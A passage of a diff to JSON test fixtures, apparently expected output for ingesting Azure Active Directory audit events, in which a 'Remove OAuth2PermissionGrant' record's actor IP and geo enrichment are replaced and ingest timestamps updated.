+ "ingested": "2021-12-09T13:41:51.125038400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", "kind": "event", @@ -7546,25 +6898,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -7578,7 +6912,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -7714,7 +7048,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -7726,12 +7060,12 @@
"id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
},
"client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
},
"event": {
- "ingested": "2021-06-17T07:32:38.036327200Z",
- "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\
"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-
661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", 
+ "ingested": "2021-12-09T13:41:51.125042900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", "kind": "event", @@ -7757,25 +7091,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -7789,7 +7105,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -7925,7 +7241,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -7937,12 +7253,12 @@
"id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
},
"client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
},
"event": {
- "ingested": "2021-06-17T07:32:38.036332700Z",
- "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\
"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-
661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;